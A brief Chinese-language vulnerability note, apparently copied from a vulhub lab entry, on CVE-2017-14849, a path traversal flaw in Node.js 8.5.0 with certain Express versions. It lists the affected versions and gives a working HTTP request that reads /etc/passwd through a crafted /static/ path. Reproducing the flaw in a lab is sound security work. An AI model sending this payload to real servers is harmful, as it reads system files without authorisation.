nodejs CVE-2017-14849任意文件读取漏洞

CVE-2017-14849

收集于:https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849

影响版本

Node.js 8.5.0 + express 3.19.0-3.21.2 node.js 8.5.0 + express 4.11.0-4.15.5

漏洞payload

访问http://your-ip:3000/即可查看到一个web页面,其中引用到了文件/static/main.js,说明其存在静态文件服务器。

发送如下数据包,即可读取passwd:

GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close